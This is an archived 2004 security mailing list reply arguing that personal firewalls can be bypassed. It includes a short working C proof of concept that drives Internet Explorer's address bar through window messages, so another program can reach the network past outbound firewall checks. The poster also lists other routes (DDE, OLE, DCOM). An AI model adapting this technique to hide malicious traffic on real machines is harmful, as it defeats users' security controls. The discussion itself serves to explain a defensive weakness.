
Security Basics mailing list archives
Re: Windows Messenger Pop-up spam
From: Ansgar -59cobalt- Wiechers <bugtraq () planetcobalt net>
Date: Thu, 9 Dec 2004 23:43:51 +0100
On 2004-12-09 Michael Painter wrote:
> On 2004-12-08 "Ansgar -59cobalt- Wiechers" wrote:
>>> You need to think in terms of users who aren't as savvy as you. You
>>> are putting absolutely no outbound checks in place.
>>
>> Those checks are useless if the malware isn't as braindead as Personal
>> Firewalls are. Like I said above: it takes 25 LoC to sneak around
>> them. *All* of them.
>
> Could you talk a little more about this? ZoneAlarm Pro alerts me when
> IE6 has been changed, so I'd like to understand exactly what you're
> saying (not asking for the code, btw.<g>)

IE doesn't get changed. You simply find a running instance of IE (or
create a new one) and send window messages (a form of IPC, has nothing
to do with the messenger service) to specific subwindows.

There's nothing secret about the code, BTW. Here's a basic example
written by a friend of mine that shows the principle without creating an
IE instance or hiding the IE window (both can be done with a few more
lines):

#include <windows.h>

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpCmdLine, int nCmdShow)
{
  /* top-level window of a running IE instance */
  HWND ie = FindWindowEx(NULL, NULL, "IEFrame", NULL);
  HWND wrk, tb, cbx, cb, url;

  if (ie == NULL) {
    MessageBox(NULL, "Run IE, or else.", "Huhu!",
               MB_OK | MB_ICONEXCLAMATION);
    return 0;
  }

  /* walk the child windows down to the address bar's edit control */
  wrk = FindWindowEx(ie, NULL, "WorkerW", NULL);
  tb = FindWindowEx(wrk, NULL, "ReBarWindow32", NULL);
  cbx = FindWindowEx(tb, NULL, "ComboBoxEx32", NULL);
  cb = FindWindowEx(cbx, NULL, "ComboBox", NULL);
  url = FindWindowEx(cb, NULL, "Edit", NULL);

  /* set the URL text, then focus the control and send Return */
  SendMessage(url, WM_SETTEXT, 0, (LPARAM)"http://www.dingens.org");
  PostMessage(url, WM_SETFOCUS, 0, 0);
  PostMessage(url, WM_KEYDOWN, VK_RETURN, 0);

  return 0;
}

To prevent this kind of attack, you would have to completely change the
way the windowing system of Windows works. And that's just one attack
vector. There are many others like DDE, OLE (this is used by tooleaky
IIRC) and (D)COM. Plus many PFWs have their config files world-writable
and "protect" them by just locking them.

That's why PFWs are useless.

Regards
Ansgar Wiechers
-- 
"Those who would give up liberty for a little temporary safety
deserve neither liberty nor safety, and will lose both."
--Benjamin Franklin